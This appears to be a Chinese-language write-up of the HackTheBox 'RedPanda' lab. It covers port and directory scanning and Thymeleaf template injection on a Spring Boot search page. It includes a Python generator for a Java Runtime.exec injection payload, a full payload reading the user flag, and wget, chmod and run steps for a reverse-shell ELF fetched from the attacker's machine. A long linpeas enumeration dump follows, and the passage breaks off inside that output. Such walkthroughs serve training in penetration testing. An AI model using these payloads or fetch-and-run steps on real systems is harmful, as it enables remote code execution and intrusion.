目录
RedPanda
信息收集
扫描目标主机的端口
nmap -sTVC 10.10.11.170
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 11:36 EDT
Nmap scan report for 10.10.11.170
Host is up (0.45s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Sun, 11 Sep 2022 15:38:23 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en" dir="ltr">
| <head>
| <meta charset="utf-8">
| <meta author="wooden_k">
| <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
| <link rel="stylesheet" href="css/panda.css" type="text/css">
| <link rel="stylesheet" href="css/main.css" type="text/css">
| <title>Red Panda Search | Made with Spring Boot</title>
| </head>
| <body>
| <div class='pande'>
| <div class='ear left'></div>
| <div class='ear right'></div>
| <div class='whiskers left'>
| <span></span>
| <span></span>
| <span></span>
| </div>
| <div class='whiskers right'>
| <span></span>
| <span></span>
| <span></span>
| </div>
| <div class='face'>
| <div class='eye
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| Content-Length: 0
| Date: Sun, 11 Sep 2022 15:38:24 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sun, 11 Sep 2022 15:38:26 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=9/11%Time=631E00EF%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;charse
SF:t=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sun,\x2011\x20Sep\x20
SF:2022\x2015:38:23\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20htm
SF:l>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\x20\
SF:x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"woode
SF:n_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://codepe
SF:n\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"stylesh
SF:eet\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"text/c
SF:ss\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\x20w
SF:ith\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\x20\
SF:x20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20clas
SF:s='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\x20r
SF:ight'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20left'>
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x
SF:20\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</
SF:div>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x
SF:20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Su
SF:n,\x2011\x20Sep\x202022\x2015:38:24\x20GMT\r\nConnection:\x20close\r\n\
SF:r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/
SF:html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435
SF:\r\nDate:\x20Sun,\x2011\x20Sep\x202022\x2015:38:26\x20GMT\r\nConnection
SF::\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>H
SF:TTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x2
SF:0type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1
SF:,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x
SF:20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px
SF:;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{heigh
SF:t:1px;background-color:#525D76;border:none;}</style></head><body><h1>HT
SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html
SF:>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.59 seconds
发现存在22(ssh)和8080(http-proxy)
访问一下站点10.10.11.170:8080
扫描网页目录
dirsearch -u 10.10.11.170:8080
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/8080_22-09-11_11-44-06.txt
Error Log: /root/.dirsearch/logs/errors-22-09-11_11-44-06.log
Target: http://10.10.11.170:8080/
[11:44:07] Starting:
[11:44:45] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[11:44:48] 400 - 435B - /a%5c.aspx
[11:45:36] 500 - 86B - /error
[11:45:36] 500 - 86B - /error/
[11:46:32] 405 - 117B - /search
[11:46:45] 200 - 987B - /stats/
[11:46:45] 200 - 987B - /stats
Task Completed
发现两个目录:/search(初始页面) 和 /stats
访问一下站点 10.10.11.170:8080/stats
识别网站指纹
whatweb 10.10.11.170:8080
http://10.10.11.170:8080 [200 OK] Content-Language[en-US], Country[RESERVED][ZZ], HTML5, IP[10.10.11.170], Title[Red Panda Search | Made with Spring Boot]
- Made with Spring Boot
- 现阶段常用Spring Boot模板引擎有 FreeMarker 、Thymeleaf。而Spring Boot默认使用的是Thymeleaf,负责渲染前端页面。
尝试在10.10.11.170:8080/stats的搜索栏中搜索(下图是默认搜索,即不输入任何内容)
- Greg is a hacker. Watch out for his injection attacks! (格雷格是个黑客。小心他的注入攻击!)
- 提示我们需要注入测试
注入攻击
- 常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入,SSTI注入等等。
- 尝试了很多注入都不成功,最后尝试SSTI注入成功
- 这里的SSTI注入就是服务器端模板注入(Server-Side Template Injection),漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
Thymeleaf中的表达式
语法 | 名称 | 描述 | 作用 |
---|---|---|---|
${...} | Variable Expressions | 变量表达式 | 取出上下文变量的值 |
*{...} | Selection Variable Expressions | 选择变量表达式 | 取出选择的对象的属性值 |
#{...} | Message Expressions | 消息表达式 | 使文字消息国际化 |
@{...} | Link URL Expressions | 链接表达式 | 用于表示各种超链接地址 |
~{...} | Fragment Expressions | 片段表达式 | 引用一段公共的代码片段 |
尝试使用${...}和#{...}表达式时,提示禁止使用,其他的就没有被过滤
python编写生成payload程序
#!/usr/bin/python3
def main():
command = input("please input command:") # specify command
convert = []
for x in command:
convert.append(str(ord(x)))
payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % convert[0]
for i in convert[1:]:
payload += ".concat(T(java.lang.Character).toString({}))".format(i)
payload += ").getInputStream())}"
print(payload)
if __name__ == "__main__":
main()
Output的payload直接输入搜索框即可
python3 example.py
please input command:cat /home/woodenk/user.txt // user.txt一般都在普通用户目录下
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())}
搜索我们需要的用户flag
反弹shell
生成木马
开启443端口监听
准备反弹shell
在本地用python开启http服务
/*并利用SSTI注入下载本地的木马*/
wget 10.10.16.10:8000/kalakala.elf
/*给 木马文件 加 执行权限*/
chmod +x kalakala.elf
/*执行 木马文件*/
./kalakala.elf
攻击机成功收到反弹的shell
这次的靶机好像会定时清理文件,怕木马被删除了还得重新上传,就多反弹了一个shell
提权
linpeas.sh提权信息收集
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own comp uters and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-121-generic (buildd@lcy02-amd64-013) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #137-Ubuntu SMP Wed Jun 15 13:33:07 UTC 2022
User & Groups: uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
Hostname: redpanda
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 5.4.0-121-generic (buildd@lcy02-amd64-013) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #137-Ub untu SMP Wed Jun 15 13:33:07 UTC 2022
Distributor ID: Ubuntu
Description: Ubuntu 20.04.4 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31
./linpeas.sh: 1188: [[: not found
./linpeas.sh: 1188: rpm: not found
./linpeas.sh: 1188: 0: not found
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Mon Sep 12 11:32:20 UTC 2022
11:32:20 up 2:31, 0 users, load average: 0.15, 0.06, 0.01
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
sed: -e expression #1, char 326: unknown option to `s'
╔══════════╣ Environment
╚ Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
SHLVL=2
OLDPWD=/home/woodenk
MAVEN_HOME=/opt/maven
_=./linpeas.sh
HISTSIZE=0
LS_COLORS=
MAVEN_VERSION=3.8.3
LESSCLOSE=/usr/bin/lesspipe %s %s
JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64/bin/java
PWD=/tmp/hsperfdata_woodenk
MAVEN_CONFIG_HOME=/home/woodenk/.m2
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
sed: -e expression #1, char 27: unknown option to `s'
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
root 1 0.0 0.5 167788 11164 ? Ss 09:00 0:02 /sbin/init maybe-ubiquity
root 462 0.0 0.5 68516 11976 ? S<s 09:00 0:00 /lib/systemd/systemd-journald
root 490 0.0 0.2 22344 5748 ? Ss 09:00 0:00 /lib/systemd/systemd-udevd
root 614 0.0 0.8 214596 17944 ? SLsl 09:01 0:00 /sbin/multipathd -d -s
systemd+ 638 0.0 0.3 90872 6144 ? Ssl 09:01 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 650 0.0 0.5 47540 10624 ? Ss 09:01 0:00 /usr/bin/VGAuthService
root 656 0.0 0.4 237776 8140 ? Ssl 09:01 0:08 /usr/bin/vmtoolsd
root 673 0.0 0.2 99896 5912 ? Ssl 09:01 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 708 0.0 0.4 239292 9316 ? Ssl 09:01 0:00 /usr/lib/accountsservice/accounts-daemon
message+ 710 0.0 0.2 7580 4456 ? Ss 09:01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 729 0.0 0.1 81956 3680 ? Ssl 09:01 0:00 /usr/sbin/irqbalance --foreground
root 730 0.0 0.4 236436 8956 ? Ssl 09:01 0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog 733 0.0 0.2 224344 5144 ? Ssl 09:01 0:00 /usr/sbin/rsyslogd -n -iNONE
root 738 0.0 0.3 17340 7892 ? Ss 09:01 0:00 /lib/systemd/systemd-logind
root 739 0.0 0.6 395484 13492 ? Ssl 09:01 0:00 /usr/lib/udisks2/udisksd
root 756 0.0 0.6 318812 13308 ? Ssl 09:01 0:00 /usr/sbin/ModemManager
root 870 0.0 0.1 6812 2952 ? Ss 09:01 0:00 /usr/sbin/cron -f
root 873 0.0 0.1 8356 3364 ? S 09:01 0:00 _ /usr/sbin/CRON -f
root 874 0.0 0.0 2608 596 ? Ss 09:01 0:00 _ /bin/sh -c sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
root 875 0.0 0.2 9420 4628 ? S 09:01 0:00 _ sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
woodenk 883 1.4 15.0 3127644 306476 ? Sl 09:01 2:15 _ java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
woodenk 1179 0.0 0.0 2608 1828 ? S 09:10 0:00 _ /bin/sh
woodenk 1658 0.0 0.0 5320 1152 ? S 09:27 0:00 | _ find /home/woodenk -exec /bin/bash -p ;
woodenk 1659 0.0 0.1 3976 3132 ? S 09:27 0:00 | _ /bin/bash -p
woodenk 6880 0.0 0.0 5320 1148 ? S 11:18 0:00 | _ find /home/woodenk/ -exec bash -ip ;
woodenk 6881 0.0 0.2 5168 4472 ? S 11:18 0:00 | _ bash -ip
woodenk 7178 0.5 0.1 3484 2524 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh
woodenk 9953 0.0 0.0 3484 968 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh
woodenk 9955 0.0 0.1 6216 3200 ? R 11:32 0:00 | | _ ps fauxwww
woodenk 9957 0.0 0.0 3484 968 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh
woodenk 1548 0.0 0.0 2608 532 ? S 09:23 0:00 _ /bin/sh
woodenk 1574 0.0 0.4 15956 9488 ? S 09:24 0:00 _ python3 -c import pty;pty.spawn('/bin/bash')
woodenk 1575 0.0 0.2 8364 4836 pts/0 Ss+ 09:24 0:00 _ /bin/bash
daemon[0m 876 0.0 0.1 3792 2180 ? Ss 09:01 0:00 /usr/sbin/atd -f
root 895 0.0 0.0 5828 1988 tty1 Ss+ 09:01 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
mysql 913 0.1 21.6 1842020 439740 ? Ssl 09:01 0:16 /usr/sbin/mysqld
systemd+ 1090 0.0 0.6 24564 13220 ? Ss 09:07 0:01 /lib/systemd/systemd-resolved
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
incrontab Not Found
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all
-rw-r--r-- 1 root root 191 Apr 23 2020 popularity-contest
/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 Jul 5 05:52 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 376 Dec 4 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
-rwxr-xr-x 1 root root 214 Apr 2 2020 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Jul 5 05:52 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 403 Aug 5 2021 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/atd.service is executing some relative path
/etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2022-09-12 15:47:22 UTC 4h 14min left Thu 2022-06-23 17:48:21 UTC 2 months 19 days ago motd-news.timer motd-news.service
Mon 2022-09-12 16:46:53 UTC 5h 14min left Mon 2022-09-12 09:49:49 UTC 1h 43min ago ua-timer.timer ua-timer.service
Mon 2022-09-12 16:47:31 UTC 5h 14min left Mon 2022-06-20 10:22:09 UTC 2 months 23 days ago fwupd-refresh.timer fwupd-refresh.service
Tue 2022-09-13 00:00:00 UTC 12h left Mon 2022-09-12 09:01:01 UTC 2h 31min ago logrotate.timer logrotate.service
Tue 2022-09-13 00:00:00 UTC 12h left Mon 2022-09-12 09:01:01 UTC 2h 31min ago man-db.timer man-db.service
Tue 2022-09-13 01:04:03 UTC 13h left Mon 2022-09-12 11:22:14 UTC 10min ago apt-daily.timer apt-daily.service
Tue 2022-09-13 06:52:08 UTC 19h left Mon 2022-09-12 09:13:02 UTC 2h 19min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Tue 2022-09-13 09:15:57 UTC 21h left Mon 2022-09-12 09:15:57 UTC 2h 16min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2022-09-18 03:10:51 UTC 5 days left Mon 2022-09-12 09:01:02 UTC 2h 31min ago e2scrub_all.timer e2scrub_all.service
Mon 2022-09-19 00:00:00 UTC 6 days left Mon 2022-09-12 09:01:01 UTC 2h 31min ago fstrim.timer fstrim.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
└─(Read Write)
/run/irqbalance//irqbalance729.sock
└─(Read )
/run/irqbalance/irqbalance729.sock
└─(Read )
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
└─(Read Write)
/run/mysqld/mysqlx.sock
└─(Read Write)
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/run/mysqld/mysqld.sock
└─(Read Write)
/var/run/mysqld/mysqlx.sock
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 638 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
:1.2 708 accounts-daemon[0m root :1.2 accounts-daemon.service - -
:1.22 12770 busctl woodenk :1.22 cron.service - -
:1.3 730 polkitd root :1.3 polkit.service - -
:1.4 1 systemd root :1.4 init.scope - -
:1.5 739 udisksd root :1.5 udisks2.service - -
:1.6 756 ModemManager root :1.6 ModemManager.service - -
:1.7 738 systemd-logind root :1.7 systemd-logind.service - -
:1.9 1090 systemd-resolve systemd-resolve :1.9 systemd-resolved.service - -
com.ubuntu.LanguageSelector - - - (activatable) - - -
com.ubuntu.SoftwareProperties - - - (activatable) - - -
org.freedesktop.Accounts 708 accounts-daemon[0m root :1.2 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.ModemManager1 756 ModemManager root :1.6 ModemManager.service - -
org.freedesktop.PackageKit - - - (activatable) - - -
org.freedesktop.PolicyKit1 730 polkitd root :1.3 polkit.service - -
